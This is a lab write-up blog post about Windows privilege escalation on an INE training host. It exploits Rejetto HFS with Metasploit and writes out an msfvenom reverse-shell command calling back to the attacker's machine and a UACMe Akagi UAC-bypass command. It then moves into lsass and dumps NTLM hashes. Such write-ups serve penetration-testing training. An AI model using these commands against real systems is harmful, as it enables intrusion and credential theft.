Post cover image

June 24, 2026

๐Ÿš€ From Foothold to SYSTEM: Bypassing Windows UAC with UACMe ๐Ÿš€

I recently completed a INE practical lab on Windows privilege escalation and wanted to share a quick step-by-step breakdown.

By Pradeep Mphector

2 min read

This walkthrough shows how a simple vulnerability in a web service can lead to full control of a machine (NT AUTHORITY\SYSTEM) if User Account Control (UAC) is not properly secured.

Initial Foothold via Rejetto HFS

During host enumeration of demo.ine.local, Port 80 was identified as running Rejetto HTTP File Server (HFS).

  • Exploited this known remote code execution vulnerability using Metasploit's rejetto_hfs_exec module.
  • Successfully established a low-integrity Meterpreter session on Windows Server 2012.

Hitting the UAC Wall:

Using getuid and net localgroup administrators, I confirmed the current user session was running as Victim\admin, a member of the local Administrators group.

None

However, attempting to change the account password resulted in an immediate "Access is denied" error.

  • The Reason: User Account Control (UAC) was active. In Windows, local administrative accounts run with a Medium Integrity token by default. Unless a process is explicitly elevated to High Integrity, administrative actions are blocked.

Bypassing UAC with UACMe (Akagi)

To bypass the UAC restriction, I used UACMe, an open-source tool that leverages built-in Windows features to auto-elevate process privileges.

1. Payload Generation Created a standard reverse shell binary using msfvenom:

  • msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Kali_IP> LPORT=4444 -f exe > backdoor.exe

2. Staging Created a C:\temp directory on the target host and uploaded both backdoor.exe and Akagi64.exe.

3. Execution Started a multi-handler listener on Kali Linux, then used Akagi Method 23 (Camberley/CurVer bypass method) to launch the backdoor payload with elevated rights:

  • .\Akagi64.exe 23 C:\temp\backdoor.exe

Achieving SYSTEM Privileges & Credential Dumping

The listener successfully caught a high-integrity administrative session.

From there, full host compromise was achieved:

None
  • Listed running processes (ps) and migrated the session directly into the Local Security Authority Subsystem Service (lsass.exe).
  • Successfully escalated privileges to NT AUTHORITY\SYSTEM.
  • Executed hashdump to harvest local account NTLM hashes, extracting the administrator's credentials for credential management assessment.
None

Key Takeaway:

Membership in the local Administrators group does not mean security controls are bypassed automatically.

If basic administrative commands fail on an admin account, UAC is likely active โ€” making specialized verification tools like UACMe essential for thorough penetration testing.